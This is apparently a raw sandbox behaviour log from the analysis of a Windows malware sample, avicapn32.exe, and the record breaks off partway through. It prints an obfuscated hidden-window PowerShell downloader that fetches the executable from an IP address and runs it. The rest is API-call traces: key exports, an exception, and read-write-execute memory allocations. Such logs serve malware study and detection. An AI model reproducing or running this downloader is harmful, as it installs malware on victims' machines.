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
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The input line is too long.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e3ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e41e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e45a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e45a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
avicapn32+0xad56aa @ 0xed56aa

exception.instruction_r: 90 e8 d1 dd fe ff e9 db de 39 00 55 c3 48 e9 a4
exception.symbol: avicapn32+0x770e5f
exception.instruction: nop
exception.module: avicapn32.exe
exception.exception_code: 0x80000004
exception.offset: 7802463
exception.address: 0xb70e5f
registers.esp: 1636216
registers.edi: 4194304
registers.eax: 1071332970
registers.ebp: 1638240
registers.edx: 47
registers.ebx: 0
registers.esi: 0
registers.ecx: 784896
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://5.75.248.207/avicapn32.exe
request GET http://5.75.248.207/avicapn32.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02770000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
